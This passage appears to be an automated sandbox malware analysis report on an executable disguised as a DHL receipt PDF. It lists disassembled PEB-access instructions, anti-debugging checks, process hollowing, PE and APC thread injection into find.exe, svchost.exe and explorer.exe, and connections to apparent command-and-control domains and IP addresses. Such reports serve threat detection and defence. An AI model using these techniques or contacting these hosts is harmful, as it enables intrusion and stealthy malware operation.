Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0375B390 mov eax, dword ptr fs:[00000030h] 14_2_0375B390
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03738794 mov eax, dword ptr fs:[00000030h] 14_2_03738794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037A7794 mov eax, dword ptr fs:[00000030h] 14_2_037A7794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037A7794 mov eax, dword ptr fs:[00000030h] 14_2_037A7794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037A7794 mov eax, dword ptr fs:[00000030h] 14_2_037A7794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037E138A mov eax, dword ptr fs:[00000030h] 14_2_037E138A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03731B8F mov eax, dword ptr fs:[00000030h] 14_2_03731B8F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03731B8F mov eax, dword ptr fs:[00000030h] 14_2_03731B8F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037DD380 mov ecx, dword ptr fs:[00000030h] 14_2_037DD380
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0374AE73 mov eax, dword ptr fs:[00000030h] 14_2_0374AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0374AE73 mov eax, dword ptr fs:[00000030h] 14_2_0374AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0374AE73 mov eax, dword ptr fs:[00000030h] 14_2_0374AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0374AE73 mov eax, dword ptr fs:[00000030h] 14_2_0374AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0374AE73 mov eax, dword ptr fs:[00000030h] 14_2_0374AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0376927A mov eax, dword ptr fs:[00000030h] 14_2_0376927A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037DB260 mov eax, dword ptr fs:[00000030h] 14_2_037DB260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037DB260 mov eax, dword ptr fs:[00000030h] 14_2_037DB260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037F8A62 mov eax, dword ptr fs:[00000030h] 14_2_037F8A62
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0373766D mov eax, dword ptr fs:[00000030h] 14_2_0373766D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037B4257 mov eax, dword ptr fs:[00000030h] 14_2_037B4257
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03729240 mov eax, dword ptr fs:[00000030h] 14_2_03729240
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03729240 mov eax, dword ptr fs:[00000030h] 14_2_03729240
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03729240 mov eax, dword ptr fs:[00000030h] 14_2_03729240
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03729240 mov eax, dword ptr fs:[00000030h] 14_2_03729240
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03737E41 mov eax, dword ptr fs:[00000030h] 14_2_03737E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03737E41 mov eax, dword ptr fs:[00000030h] 14_2_03737E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03737E41 mov eax, dword ptr fs:[00000030h] 14_2_03737E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03737E41 mov eax, dword ptr fs:[00000030h] 14_2_03737E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03737E41 mov eax, dword ptr fs:[00000030h] 14_2_03737E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03737E41 mov eax, dword ptr fs:[00000030h] 14_2_03737E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037DFE3F mov eax, dword ptr fs:[00000030h] 14_2_037DFE3F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0372E620 mov eax, dword ptr fs:[00000030h] 14_2_0372E620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0372AA16 mov eax, dword ptr fs:[00000030h] 14_2_0372AA16
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0372AA16 mov eax, dword ptr fs:[00000030h] 14_2_0372AA16
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03743A1C mov eax, dword ptr fs:[00000030h] 14_2_03743A1C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0375A61C mov eax, dword ptr fs:[00000030h] 14_2_0375A61C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0375A61C mov eax, dword ptr fs:[00000030h] 14_2_0375A61C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0372C600 mov eax, dword ptr fs:[00000030h] 14_2_0372C600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0372C600 mov eax, dword ptr fs:[00000030h] 14_2_0372C600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0372C600 mov eax, dword ptr fs:[00000030h] 14_2_0372C600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03758E00 mov eax, dword ptr fs:[00000030h] 14_2_03758E00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03738A0A mov eax, dword ptr fs:[00000030h] 14_2_03738A0A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037376E2 mov eax, dword ptr fs:[00000030h] 14_2_037376E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03752AE4 mov eax, dword ptr fs:[00000030h] 14_2_03752AE4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037516E0 mov ecx, dword ptr fs:[00000030h] 14_2_037516E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037F8ED6 mov eax, dword ptr fs:[00000030h] 14_2_037F8ED6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03768EC7 mov eax, dword ptr fs:[00000030h] 14_2_03768EC7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037536CC mov eax, dword ptr fs:[00000030h] 14_2_037536CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037DFEC0 mov eax, dword ptr fs:[00000030h] 14_2_037DFEC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03752ACB mov eax, dword ptr fs:[00000030h] 14_2_03752ACB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0373AAB0 mov eax, dword ptr fs:[00000030h] 14_2_0373AAB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0373AAB0 mov eax, dword ptr fs:[00000030h] 14_2_0373AAB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0375FAB0 mov eax, dword ptr fs:[00000030h] 14_2_0375FAB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037252A5 mov eax, dword ptr fs:[00000030h] 14_2_037252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037252A5 mov eax, dword ptr fs:[00000030h] 14_2_037252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037252A5 mov eax, dword ptr fs:[00000030h] 14_2_037252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037252A5 mov eax, dword ptr fs:[00000030h] 14_2_037252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037252A5 mov eax, dword ptr fs:[00000030h] 14_2_037252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037F0EA5 mov eax, dword ptr fs:[00000030h] 14_2_037F0EA5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037F0EA5 mov eax, dword ptr fs:[00000030h] 14_2_037F0EA5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037F0EA5 mov eax, dword ptr fs:[00000030h] 14_2_037F0EA5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037A46A7 mov eax, dword ptr fs:[00000030h] 14_2_037A46A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0375D294 mov eax, dword ptr fs:[00000030h] 14_2_0375D294
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0375D294 mov eax, dword ptr fs:[00000030h] 14_2_0375D294
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037BFE87 mov eax, dword ptr fs:[00000030h] 14_2_037BFE87
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0372B171 mov eax, dword ptr fs:[00000030h] 14_2_0372B171
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0372B171 mov eax, dword ptr fs:[00000030h] 14_2_0372B171
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0374C577 mov eax, dword ptr fs:[00000030h] 14_2_0374C577
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0374C577 mov eax, dword ptr fs:[00000030h] 14_2_0374C577
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0372C962 mov eax, dword ptr fs:[00000030h] 14_2_0372C962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03747D50 mov eax, dword ptr fs:[00000030h] 14_2_03747D50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0374B944 mov eax, dword ptr fs:[00000030h] 14_2_0374B944
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0374B944 mov eax, dword ptr fs:[00000030h] 14_2_0374B944
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03763D43 mov eax, dword ptr fs:[00000030h] 14_2_03763D43
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037A3540 mov eax, dword ptr fs:[00000030h] 14_2_037A3540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0372AD30 mov eax, dword ptr fs:[00000030h] 14_2_0372AD30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03733D34 mov eax, dword ptr fs:[00000030h] 14_2_03733D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03733D34 mov eax, dword ptr fs:[00000030h] 14_2_03733D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03733D34 mov eax, dword ptr fs:[00000030h] 14_2_03733D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03733D34 mov eax, dword ptr fs:[00000030h] 14_2_03733D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03733D34 mov eax, dword ptr fs:[00000030h] 14_2_03733D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03733D34 mov eax, dword ptr fs:[00000030h] 14_2_03733D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03733D34 mov eax, dword ptr fs:[00000030h] 14_2_03733D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03733D34 mov eax, dword ptr fs:[00000030h] 14_2_03733D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03733D34 mov eax, dword ptr fs:[00000030h] 14_2_03733D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03733D34 mov eax, dword ptr fs:[00000030h] 14_2_03733D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03733D34 mov eax, dword ptr fs:[00000030h] 14_2_03733D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03733D34 mov eax, dword ptr fs:[00000030h] 14_2_03733D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03733D34 mov eax, dword ptr fs:[00000030h] 14_2_03733D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037F8D34 mov eax, dword ptr fs:[00000030h] 14_2_037F8D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037AA537 mov eax, dword ptr fs:[00000030h] 14_2_037AA537
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03754D3B mov eax, dword ptr fs:[00000030h] 14_2_03754D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03754D3B mov eax, dword ptr fs:[00000030h] 14_2_03754D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03754D3B mov eax, dword ptr fs:[00000030h] 14_2_03754D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0375513A mov eax, dword ptr fs:[00000030h] 14_2_0375513A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0375513A mov eax, dword ptr fs:[00000030h] 14_2_0375513A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03744120 mov eax, dword ptr fs:[00000030h] 14_2_03744120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03744120 mov eax, dword ptr fs:[00000030h] 14_2_03744120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03744120 mov eax, dword ptr fs:[00000030h] 14_2_03744120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03744120 mov eax, dword ptr fs:[00000030h] 14_2_03744120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03744120 mov ecx, dword ptr fs:[00000030h] 14_2_03744120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03729100 mov eax, dword ptr fs:[00000030h] 14_2_03729100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03729100 mov eax, dword ptr fs:[00000030h] 14_2_03729100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03729100 mov eax, dword ptr fs:[00000030h] 14_2_03729100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037D8DF1 mov eax, dword ptr fs:[00000030h] 14_2_037D8DF1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0372B1E1 mov eax, dword ptr fs:[00000030h] 14_2_0372B1E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0372B1E1 mov eax, dword ptr fs:[00000030h] 14_2_0372B1E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0372B1E1 mov eax, dword ptr fs:[00000030h] 14_2_0372B1E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037B41E8 mov eax, dword ptr fs:[00000030h] 14_2_037B41E8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0373D5E0 mov eax, dword ptr fs:[00000030h] 14_2_0373D5E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0373D5E0 mov eax, dword ptr fs:[00000030h] 14_2_0373D5E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03751DB5 mov eax, dword ptr fs:[00000030h] 14_2_03751DB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03751DB5 mov eax, dword ptr fs:[00000030h] 14_2_03751DB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03751DB5 mov eax, dword ptr fs:[00000030h] 14_2_03751DB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037A51BE mov eax, dword ptr fs:[00000030h] 14_2_037A51BE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037A51BE mov eax, dword ptr fs:[00000030h] 14_2_037A51BE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037A51BE mov eax, dword ptr fs:[00000030h] 14_2_037A51BE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037A51BE mov eax, dword ptr fs:[00000030h] 14_2_037A51BE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037535A1 mov eax, dword ptr fs:[00000030h] 14_2_037535A1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037561A0 mov eax, dword ptr fs:[00000030h] 14_2_037561A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037561A0 mov eax, dword ptr fs:[00000030h] 14_2_037561A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037A69A6 mov eax, dword ptr fs:[00000030h] 14_2_037A69A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03752990 mov eax, dword ptr fs:[00000030h] 14_2_03752990
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0375FD9B mov eax, dword ptr fs:[00000030h] 14_2_0375FD9B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0375FD9B mov eax, dword ptr fs:[00000030h] 14_2_0375FD9B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0375A185 mov eax, dword ptr fs:[00000030h] 14_2_0375A185
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03752581 mov eax, dword ptr fs:[00000030h] 14_2_03752581
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03752581 mov eax, dword ptr fs:[00000030h] 14_2_03752581
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03752581 mov eax, dword ptr fs:[00000030h] 14_2_03752581
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0374C182 mov eax, dword ptr fs:[00000030h] 14_2_0374C182
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03722D8A mov eax, dword ptr fs:[00000030h] 14_2_03722D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03722D8A mov eax, dword ptr fs:[00000030h] 14_2_03722D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03722D8A mov eax, dword ptr fs:[00000030h] 14_2_03722D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03722D8A mov eax, dword ptr fs:[00000030h] 14_2_03722D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03722D8A mov eax, dword ptr fs:[00000030h] 14_2_03722D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037F1074 mov eax, dword ptr fs:[00000030h] 14_2_037F1074
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037E2073 mov eax, dword ptr fs:[00000030h] 14_2_037E2073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0374746D mov eax, dword ptr fs:[00000030h] 14_2_0374746D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03740050 mov eax, dword ptr fs:[00000030h] 14_2_03740050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03740050 mov eax, dword ptr fs:[00000030h] 14_2_03740050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037BC450 mov eax, dword ptr fs:[00000030h] 14_2_037BC450
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037BC450 mov eax, dword ptr fs:[00000030h] 14_2_037BC450
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0375A44B mov eax, dword ptr fs:[00000030h] 14_2_0375A44B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0375002D mov eax, dword ptr fs:[00000030h] 14_2_0375002D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0375002D mov eax, dword ptr fs:[00000030h] 14_2_0375002D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0375002D mov eax, dword ptr fs:[00000030h] 14_2_0375002D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0375002D mov eax, dword ptr fs:[00000030h] 14_2_0375002D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0375002D mov eax, dword ptr fs:[00000030h] 14_2_0375002D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0373B02A mov eax, dword ptr fs:[00000030h] 14_2_0373B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0373B02A mov eax, dword ptr fs:[00000030h] 14_2_0373B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0373B02A mov eax, dword ptr fs:[00000030h] 14_2_0373B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0373B02A mov eax, dword ptr fs:[00000030h] 14_2_0373B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0375BC2C mov eax, dword ptr fs:[00000030h] 14_2_0375BC2C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037F4015 mov eax, dword ptr fs:[00000030h] 14_2_037F4015
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037F4015 mov eax, dword ptr fs:[00000030h] 14_2_037F4015
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037A7016 mov eax, dword ptr fs:[00000030h] 14_2_037A7016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037A7016 mov eax, dword ptr fs:[00000030h] 14_2_037A7016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037A7016 mov eax, dword ptr fs:[00000030h] 14_2_037A7016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037A6C0A mov eax, dword ptr fs:[00000030h] 14_2_037A6C0A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037A6C0A mov eax, dword ptr fs:[00000030h] 14_2_037A6C0A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037A6C0A mov eax, dword ptr fs:[00000030h] 14_2_037A6C0A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037A6C0A mov eax, dword ptr fs:[00000030h] 14_2_037A6C0A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037F740D mov eax, dword ptr fs:[00000030h] 14_2_037F740D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037F740D mov eax, dword ptr fs:[00000030h] 14_2_037F740D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037F740D mov eax, dword ptr fs:[00000030h] 14_2_037F740D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037E1C06 mov eax, dword ptr fs:[00000030h] 14_2_037E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037E1C06 mov eax, dword ptr fs:[00000030h] 14_2_037E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037E1C06 mov eax, dword ptr fs:[00000030h] 14_2_037E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037E1C06 mov eax, dword ptr fs:[00000030h] 14_2_037E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037E1C06 mov eax, dword ptr fs:[00000030h] 14_2_037E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037E1C06 mov eax, dword ptr fs:[00000030h] 14_2_037E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037E1C06 mov eax, dword ptr fs:[00000030h] 14_2_037E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037E1C06 mov eax, dword ptr fs:[00000030h] 14_2_037E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037E1C06 mov eax, dword ptr fs:[00000030h] 14_2_037E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037E1C06 mov eax, dword ptr fs:[00000030h] 14_2_037E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037E1C06 mov eax, dword ptr fs:[00000030h] 14_2_037E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037E1C06 mov eax, dword ptr fs:[00000030h] 14_2_037E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037E1C06 mov eax, dword ptr fs:[00000030h] 14_2_037E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037E1C06 mov eax, dword ptr fs:[00000030h] 14_2_037E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037E14FB mov eax, dword ptr fs:[00000030h] 14_2_037E14FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037A6CF0 mov eax, dword ptr fs:[00000030h] 14_2_037A6CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037A6CF0 mov eax, dword ptr fs:[00000030h] 14_2_037A6CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037A6CF0 mov eax, dword ptr fs:[00000030h] 14_2_037A6CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037F8CD6 mov eax, dword ptr fs:[00000030h] 14_2_037F8CD6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037BB8D0 mov eax, dword ptr fs:[00000030h] 14_2_037BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037BB8D0 mov ecx, dword ptr fs:[00000030h] 14_2_037BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037BB8D0 mov eax, dword ptr fs:[00000030h] 14_2_037BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037BB8D0 mov eax, dword ptr fs:[00000030h] 14_2_037BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037BB8D0 mov eax, dword ptr fs:[00000030h] 14_2_037BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037BB8D0 mov eax, dword ptr fs:[00000030h] 14_2_037BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0375F0BF mov ecx, dword ptr fs:[00000030h] 14_2_0375F0BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0375F0BF mov eax, dword ptr fs:[00000030h] 14_2_0375F0BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0375F0BF mov eax, dword ptr fs:[00000030h] 14_2_0375F0BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037690AF mov eax, dword ptr fs:[00000030h] 14_2_037690AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0373849B mov eax, dword ptr fs:[00000030h] 14_2_0373849B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03729080 mov eax, dword ptr fs:[00000030h] 14_2_03729080
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037A3884 mov eax, dword ptr fs:[00000030h] 14_2_037A3884
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037A3884 mov eax, dword ptr fs:[00000030h] 14_2_037A3884
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\find.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_00409B50 LdrLoadDll, 2_2_00409B50
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.cherylwoya.com
Source: C:\Windows\explorer.exe Network Connect: 64.34.156.161 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.946abg.net
Source: C:\Windows\explorer.exe Domain query: www.kyousaku.net
Source: C:\Windows\explorer.exe Network Connect: 154.86.129.243 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Windows\SysWOW64\find.exe Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 8A0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\find.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\find.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\find.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Memory written: C:\Windows\SysWOW64\find.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Memory written: C:\Windows\SysWOW64\find.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Memory written: C:\Windows\SysWOW64\find.exe base: 429000 Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Memory written: C:\Windows\SysWOW64\find.exe base: B0D008 Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Memory allocated: C:\Windows\SysWOW64\find.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Memory written: C:\Windows\SysWOW64\find.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\find.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\find.exe Thread register set: target process: 684 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread register set: target process: 684 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process created: C:\Windows\SysWOW64\tcmsetup.exe C:\Windows\SysWOW64\tcmsetup.exe Jump to behavior
